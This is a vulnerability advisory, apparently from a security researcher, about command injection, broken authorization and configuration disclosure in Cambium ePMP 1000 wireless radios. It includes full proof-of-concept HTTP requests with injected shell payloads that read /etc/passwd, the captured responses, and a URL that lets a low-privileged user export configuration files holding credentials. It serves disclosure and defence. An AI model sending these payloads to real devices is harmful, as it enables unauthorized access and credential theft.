1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 |
*July 14, 2015: *First contacted Cambium *July 14, 2015: *Initial vendor response *July 16, 2015: *Vuln Details reported to Cambium *July 31, 2015:* Followup on advisory and fix timelines *August 03, 2015: *Vendor gives mid-Aug as fix (v2.5) release timeline. Ceases communication. *Nov 19, 2015: *Releasing vulnerability details & poc *Versions affected*: < v2.5 ..... *CVE-IDs* - To be assigned. ..... *Background * http://www.cambiumnetworks.com/products/access/epmp-1000/ ePMP™ 1000 Wireless service providers and enterprises need reliable, high-quality broadband connectivity that can be rapidly deployed and expanded. The ePMP platform provides stable coverage across large service areas and enhances your existing infrastructure. *Deployed by:* ION Telecom Kayse Wireless Vanilla Telecom Traeger Park EszakNet Edera Videon COMeSER Seattle, WA Budapest Video Surveillance Desktop Silo Wireless Rocket Broadband Snavely Forest Products KRK Sistemi KAJA Komputer Root Media *Vulnerability Details* *From Cambium Networks ePMP 1000 user / configuration guide: * ePMP 1000 has four (4) users - - ADMINISTRATOR, who has full read and write permissions. - INSTALLER, who has permissions to read and write parameters applicable to unit installation and monitoring. - HOME, who has permissions only to access pertinent information for support purposes - READONLY, who only has permissions to view the Monitor page. ..... 1. *OS Command Injection * 'admin' and 'installer' users have access to perform Ping and Traceroute functions via GUI. No other user has this access. Ping function accepts destination IP address value via 'ping_ip parameter and uses three (3) other parameters - packets_num, buf_size and ttl, to perform Ping. Traceroute function accepts destination IP address via 'traceroute_ip' parameter. The application does not perform strict input validation for all these parameters - ping_ip', packets_num, buf_size and ttl for Ping function; and traceroute_ip for Traceroute function. This allows an authenticated user - 'admin' or non-admin, low-privileged 'installer' & ‘home’ users - to be able to inject arbitrary system commands that gets executed by the host. ..... *PING PoC * ..... HTTP Request ..... POST /cgi-bin/luci/;stok=<stok_value>/admin/ping HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=<stok_value> DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0 [ *or* ping_ip=8.8.8.8&packets_num=1|cat%20/etc/passwd%20||&buf_size=1&ttl=1&debug=0 *or* ping_ip=8.8.8.8&packets_num=1&buf_size=1|cat%20/etc/passwd%20||&ttl=1&debug=0 *or* ping_ip=8.8.8.8&packets_num=1&buf_size=1&ttl=1|cat%20/etc/passwd%20||&debug=0 ] ..... HTTP Response ..... HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: text/plain Expires: 0 Date: Sun, 18 Jan 1970 14:45:37 GMT Server: Cambium HTTP Server daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish installer:<password_hash>:2000:100:installer:/tmp:/bin/false home:<password_hash>:3000:100:home:/tmp:/bin/false readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false root:<password_hash>:0:0:root:/root:/bin/ash ..... *traceroute - PoC * ..... HTTP Request ..... POST /cgi-bin/luci/;stok=<stok_value>/admin/traceroute HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=<stok_value> DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache traceroute_ip=8.8.8.8|cat%20/etc/passwd%20||&fragm=0&trace_method=icmp_echo&display_ttl=0&verbose=0&debug=0 ..... HTTP Response ..... HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: text/plain Expires: 0 Date: Sun, 18 Jan 1970 16:09:26 GMT Server: Cambium HTTP Server daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish installer:<password_hash>:2000:100:installer:/tmp:/bin/false home:<password_hash>:3000:100:home:/tmp:/bin/false readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false root:<password_hash>:0:0:root:/root:/bin/ash ..... 2. *Weak Authorization Controls + privilege escalation* 'home' and 'readonly' users do not have access to Ping and Traceroute functions via management portal. However, the application lacks strict authorization controls, and we can still perform both these functions by sending corresponding HTTP(S) requests directly, when logged in as low-privileged, 'home' user. When we combine this flaw with above described OS Command Injection affecting ping and traceroute, it is possible for non-admin, low-privileged, ‘home’ user to execute system level commands via 'ping' and 'traceroute' functions and dump password hashes easily and / or perform any system level functions. *Note*: ‘readonly’ user cannot perform this. Only ‘home’ user can exploit these. ..... *Steps to attack - * a login as home user b craft & send HTTP request for ping and traceroute functions ..... Login - HTTP Request .. POST /cgi-bin/luci HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache username=home&password=<password> ..... Login - HTTP Response .. HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Set-Cookie: sysauth=<home-sysauth_value>; path=/cgi-bin/luci/;stok=<home-stok-value> Content-Type: application/json Expires: 0 Date: Sun, 18 Jan 1970 16:40:50 GMT Server: Cambium HTTP Server { "stok": <home-stok_value>", "certif_dir": "/tmp/new_certificates/", "status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status } .. *Sending HTTP request for Ping function * ..... HTTP Request ..... POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1 Host: <IP_address> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://<IP_address>/ Cookie: sysauth=<home-sysauth_value>; globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Home User; usernameType=home; stok=<home-stok_value> DNT: 1 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0 ..... HTTP Response ..... HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: text/plain Expires: 0 Date: Sun, 18 Jan 1970 14:45:37 GMT Server: Cambium HTTP Server daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish installer:<password_hash>:2000:100:installer:/tmp:/bin/false home:<password_hash>:3000:100:home:/tmp:/bin/false readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false root:<password_hash>:0:0:root:/root:/bin/ash .. Similarly, Traceroute function can be exploited. ...................................................................................................................................................... 3. *Weak Authorization Controls + Information Disclosure* In addition to 'admin', only 'installer' user has the option to access device configuration. ‘home’ user does not have GUI option and should not be able to access / download device configuration. However, the application lacks strict authorization measures and the low-privileged 'home' user can gain unauthorized access to the device configuration simply by requesting it. *Configuration backup export* can be performed by directly accessing the following url: *http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json * Upon a successful config export, full device configuration with clear-text passwords, usernames, keys, IP addresses, statistics, logs etc is downloaded. HTTP/1.1 200 OK Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Cache-Control: no-cache Status: 200 OK Content-Type: application/json Content-Disposition: attachment; filename=<filename>.json Expires: 0 Date: Sun, 18 Jan 1970 16:50:21 GMT Server: Cambium HTTP Server { "template_props": { "templateName":"", "templateDescription":"", "device_type":"", … <output - snipped> … } ..... Best Regards, Karn Ganeshen -- Best Regards, Karn Ganeshen |